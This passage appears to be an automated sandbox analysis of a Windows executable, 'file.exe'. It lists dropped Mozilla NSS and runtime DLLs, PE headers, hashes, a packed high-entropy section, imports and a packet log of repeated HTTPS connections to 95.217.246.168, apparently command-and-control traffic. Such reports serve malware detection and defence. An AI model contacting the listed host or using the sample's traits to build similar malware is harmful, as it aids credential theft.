Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	7.542795214027541
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	407'040 bytes
MD5:	4b46a0105ccb6a18f9872c93f12d06fc
SHA1:	0431e68c03ca35eae0dac613e7e8b9628aa0dc3a
SHA256:	85d635c9d2462f7f97a7d91bb8e0e72eeebf5f394580f6a97a016f2f42f9c29a
SHA512:	9ce3ebd4fd9b6a454ea7bf3dba6742a237547cc210b93e792cfb53b632986e1d9850bb072818821b513456079ad2c9bd7c5e491f4f02dc52109b65241463dca7
SSDEEP:	6144:FBQ4J4ZgQBW643RESjJMLGDzlkGqXu1Kw8lv/qIQEfEXTPSrmNidzsyXRa:c4J4ZH65jJMLixILXR82kizPXRa
TLSH:	1684E01576C08072D97325321AF0D7B8AE3DF9704BA2AD9F67D40FBE4F312829611A5B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3.LBw.".w.".w."...!.{."...'..."...&.b."...#.t.".w.#..."..N&.e."..N!.c."..N'.:."..M'.v."..M..v."..M .v.".Richw.".........PE..L..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4065e6
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x662B5DC8 [Fri Apr 26 07:54:48 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	cdeb934de86508839c03da752239bd9f

Entrypoint Preview

Instruction
call 00007EFEECD71759h
jmp 00007EFEECD70ED9h
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov ecx, dword ptr [eax+3Ch]
add ecx, eax
movzx eax, word ptr [ecx+14h]
lea edx, dword ptr [ecx+18h]
add edx, eax
movzx eax, word ptr [ecx+06h]
imul esi, eax, 28h
add esi, edx
cmp edx, esi
je 00007EFEECD7107Bh
mov ecx, dword ptr [ebp+0Ch]
cmp ecx, dword ptr [edx+0Ch]
jc 00007EFEECD7106Ch
mov eax, dword ptr [edx+08h]
add eax, dword ptr [edx+0Ch]
cmp ecx, eax
jc 00007EFEECD7106Eh
add edx, 28h
cmp edx, esi
jne 00007EFEECD7104Ch
xor eax, eax
pop esi
pop ebp
ret
mov eax, edx
jmp 00007EFEECD7105Bh
push esi
call 00007EFEECD71A30h
test eax, eax
je 00007EFEECD71082h
mov eax, dword ptr fs:[00000018h]
mov esi, 0042F254h
mov edx, dword ptr [eax+04h]
jmp 00007EFEECD71066h
cmp edx, eax
je 00007EFEECD71072h
xor eax, eax
mov ecx, edx
lock cmpxchg dword ptr [esi], ecx
test eax, eax
jne 00007EFEECD71052h
xor al, al
pop esi
ret
mov al, 01h
pop esi
ret
push ebp
mov ebp, esp
cmp dword ptr [ebp+08h], 00000000h
jne 00007EFEECD71069h
mov byte ptr [0042F258h], 00000001h
call 00007EFEECD71266h
call 00007EFEECD73FC3h
test al, al
jne 00007EFEECD71066h
xor al, al
pop ebp
ret
call 00007EFEECD7D583h
test al, al
jne 00007EFEECD7106Ch
push 00000000h
call 00007EFEECD73FCAh
pop ecx
jmp 00007EFEECD7104Bh
mov al, 01h
pop ebp
ret
push ebp
mov ebp, esp
cmp byte ptr [0042F259h], 00000000h
je 00007EFEECD71066h
mov al, 01h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2d6b4	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x65000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x66000	0x1ab0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x2bc18	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2bb58	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x24000	0x138	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2197c	0x21a00	7c9bc1f85f5d6d751ec15e04455ab35c	False	0.5806880227695167	data	6.631235886095709	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.bss	0x23000	0x4a3	0x600	ba7d24d62984e799cdc64e7f036848e7	False	0.6145833333333334	data	5.4965331963446475	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x24000	0x9db4	0x9e00	5133ee9ffc5578520fc75c589c942faf	False	0.4362143987341772	data	4.987409730015681	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x2e000	0x1d54	0x1000	76ef24439867409e35b5b1a3b983e2ab	False	0.191162109375	data	3.056495283695018	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bsS	0x30000	0x344c4	0x34600	a7314c0c710296d6938c5a8c363c9e91	False	0.9967882980310262	data	7.998260278234932	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x65000	0x1e0	0x200	32eacc1fd3975b8ce308561d80eddd2c	False	0.52734375	data	4.7122981932940915	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x66000	0x1ab0	0x1c00	eae2e7ccc338e43cb2d6021b18a7ebfa	False	0.7378627232142857	data	6.419399258043913	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x65060	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL

Import

KERNEL32.dll

VirtualProtect, FreeConsole, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, CreateFileW, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, GetCommandLineA, GetCommandLineW, HeapAlloc, HeapFree, GetFileType, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileSizeEx, SetFilePointerEx, CloseHandle, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, GetProcessHeap, ReadConsoleW, HeapSize, WriteConsoleW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 26, 2024 11:02:51.973092079 CEST	49730	443	192.168.2.4	23.194.234.100
Apr 26, 2024 11:02:51.973126888 CEST	443	49730	23.194.234.100	192.168.2.4
Apr 26, 2024 11:02:51.973200083 CEST	49730	443	192.168.2.4	23.194.234.100
Apr 26, 2024 11:02:51.979227066 CEST	49730	443	192.168.2.4	23.194.234.100
Apr 26, 2024 11:02:51.979243040 CEST	443	49730	23.194.234.100	192.168.2.4
Apr 26, 2024 11:02:52.250580072 CEST	443	49730	23.194.234.100	192.168.2.4
Apr 26, 2024 11:02:52.250689030 CEST	49730	443	192.168.2.4	23.194.234.100
Apr 26, 2024 11:02:52.320884943 CEST	49730	443	192.168.2.4	23.194.234.100
Apr 26, 2024 11:02:52.320923090 CEST	443	49730	23.194.234.100	192.168.2.4
Apr 26, 2024 11:02:52.321976900 CEST	443	49730	23.194.234.100	192.168.2.4
Apr 26, 2024 11:02:52.322047949 CEST	49730	443	192.168.2.4	23.194.234.100
Apr 26, 2024 11:02:52.326005936 CEST	49730	443	192.168.2.4	23.194.234.100
Apr 26, 2024 11:02:52.372144938 CEST	443	49730	23.194.234.100	192.168.2.4
Apr 26, 2024 11:02:52.817059994 CEST	443	49730	23.194.234.100	192.168.2.4
Apr 26, 2024 11:02:52.817120075 CEST	443	49730	23.194.234.100	192.168.2.4
Apr 26, 2024 11:02:52.817162037 CEST	443	49730	23.194.234.100	192.168.2.4
Apr 26, 2024 11:02:52.817163944 CEST	49730	443	192.168.2.4	23.194.234.100
Apr 26, 2024 11:02:52.817209959 CEST	443	49730	23.194.234.100	192.168.2.4
Apr 26, 2024 11:02:52.817240953 CEST	49730	443	192.168.2.4	23.194.234.100
Apr 26, 2024 11:02:52.817241907 CEST	49730	443	192.168.2.4	23.194.234.100
Apr 26, 2024 11:02:52.817270041 CEST	49730	443	192.168.2.4	23.194.234.100
Apr 26, 2024 11:02:52.939903975 CEST	443	49730	23.194.234.100	192.168.2.4
Apr 26, 2024 11:02:52.939970970 CEST	443	49730	23.194.234.100	192.168.2.4
Apr 26, 2024 11:02:52.940016985 CEST	49730	443	192.168.2.4	23.194.234.100
Apr 26, 2024 11:02:52.940061092 CEST	443	49730	23.194.234.100	192.168.2.4
Apr 26, 2024 11:02:52.940089941 CEST	49730	443	192.168.2.4	23.194.234.100
Apr 26, 2024 11:02:52.940131903 CEST	49730	443	192.168.2.4	23.194.234.100
Apr 26, 2024 11:02:52.961884975 CEST	443	49730	23.194.234.100	192.168.2.4
Apr 26, 2024 11:02:52.961987019 CEST	49730	443	192.168.2.4	23.194.234.100
Apr 26, 2024 11:02:52.962028027 CEST	443	49730	23.194.234.100	192.168.2.4
Apr 26, 2024 11:02:52.962054968 CEST	443	49730	23.194.234.100	192.168.2.4
Apr 26, 2024 11:02:52.962105989 CEST	49730	443	192.168.2.4	23.194.234.100
Apr 26, 2024 11:02:52.973866940 CEST	49730	443	192.168.2.4	23.194.234.100
Apr 26, 2024 11:02:52.973891020 CEST	443	49730	23.194.234.100	192.168.2.4
Apr 26, 2024 11:02:52.986180067 CEST	49731	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:52.986277103 CEST	443	49731	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:52.988862991 CEST	49731	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:52.989125013 CEST	49731	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:52.989159107 CEST	443	49731	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:53.838362932 CEST	443	49731	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:53.838449955 CEST	49731	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:53.843271971 CEST	49731	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:53.843301058 CEST	443	49731	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:53.843707085 CEST	443	49731	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:53.843771935 CEST	49731	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:53.844168901 CEST	49731	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:53.888145924 CEST	443	49731	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:54.447067976 CEST	443	49731	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:54.447218895 CEST	443	49731	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:54.447266102 CEST	49731	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:54.447330952 CEST	49731	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:54.449626923 CEST	49731	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:54.449670076 CEST	443	49731	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:54.451615095 CEST	49732	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:54.451709986 CEST	443	49732	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:54.451800108 CEST	49732	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:54.452037096 CEST	49732	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:54.452084064 CEST	443	49732	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:54.991734028 CEST	443	49732	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:54.991833925 CEST	49732	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:54.998028040 CEST	49732	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:54.998044014 CEST	443	49732	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:54.999748945 CEST	49732	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:54.999754906 CEST	443	49732	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:55.948420048 CEST	443	49732	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:55.948482990 CEST	49732	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:55.948508978 CEST	443	49732	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:55.948549986 CEST	49732	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:55.948556900 CEST	443	49732	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:55.948596954 CEST	49732	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:55.948626041 CEST	443	49732	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:55.948678017 CEST	49732	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:55.948807001 CEST	49732	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:55.948823929 CEST	443	49732	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:55.950362921 CEST	49733	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:55.950445890 CEST	443	49733	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:55.950534105 CEST	49733	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:55.950733900 CEST	49733	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:55.950769901 CEST	443	49733	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:56.496658087 CEST	443	49733	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:56.496731043 CEST	49733	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:56.497092009 CEST	49733	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:56.497107983 CEST	443	49733	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:56.498656034 CEST	49733	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:56.498672009 CEST	443	49733	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:57.444387913 CEST	443	49733	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:57.444444895 CEST	443	49733	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:57.444474936 CEST	49733	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:57.444535017 CEST	443	49733	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:57.444571018 CEST	49733	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:57.444591999 CEST	49733	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:57.444608927 CEST	443	49733	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:57.444655895 CEST	49733	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:57.444742918 CEST	49733	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:57.444772005 CEST	443	49733	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:57.446225882 CEST	49734	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:57.446315050 CEST	443	49734	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:57.446407080 CEST	49734	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:57.446588039 CEST	49734	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:57.446624994 CEST	443	49734	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:57.976494074 CEST	443	49734	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:57.976619005 CEST	49734	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:57.977085114 CEST	49734	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:57.977112055 CEST	443	49734	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:57.978677034 CEST	49734	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:57.978691101 CEST	443	49734	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:58.911550999 CEST	443	49734	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:58.911612034 CEST	443	49734	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:58.911654949 CEST	49734	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:58.911721945 CEST	443	49734	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:58.911756992 CEST	443	49734	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:58.911758900 CEST	49734	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:58.911815882 CEST	49734	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:58.911817074 CEST	49734	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:58.912174940 CEST	49734	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:58.912205935 CEST	443	49734	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:58.984009027 CEST	49735	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:58.984088898 CEST	443	49735	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:58.984177113 CEST	49735	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:58.984374046 CEST	49735	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:58.984431028 CEST	443	49735	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:59.518294096 CEST	443	49735	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:59.518425941 CEST	49735	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:59.519335032 CEST	49735	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:59.519361973 CEST	443	49735	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:59.521739006 CEST	49735	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:59.521752119 CEST	443	49735	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:59.521800041 CEST	49735	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:59.521830082 CEST	443	49735	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:59.973032951 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:59.973105907 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:02:59.973192930 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:59.973407030 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:02:59.973438025 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:00.492439985 CEST	443	49735	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:00.492551088 CEST	49735	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:00.492614031 CEST	443	49735	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:00.492649078 CEST	443	49735	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:00.492681026 CEST	49735	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:00.492711067 CEST	49735	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:00.493447065 CEST	49735	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:00.493478060 CEST	443	49735	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:00.507599115 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:00.507709026 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:00.509990931 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:00.510032892 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:00.511513948 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:00.511528969 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:01.346416950 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:01.346483946 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:01.346525908 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:01.346534967 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:01.346600056 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:01.346600056 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:01.346621037 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:01.346683025 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:01.463965893 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:01.464015007 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:01.464072943 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:01.464093924 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:01.464119911 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:01.464134932 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:01.651314020 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:01.651381969 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:01.651448965 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:01.651504993 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:01.651539087 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:01.651561022 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:01.757980108 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:01.758030891 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:01.758085966 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:01.758137941 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:01.758168936 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:01.758192062 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:01.850261927 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:01.850330114 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:01.850398064 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:01.850439072 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:01.850461960 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:01.850486040 CEST	49736	443	192.168.2.4	95.217.246.168
Apr 26, 2024 11:03:01.925508022 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:01.925560951 CEST	443	49736	95.217.246.168	192.168.2.4
Apr 26, 2024 11:03:01.925620079 CEST	49736	443	192.168.2.4	95.217.246.168
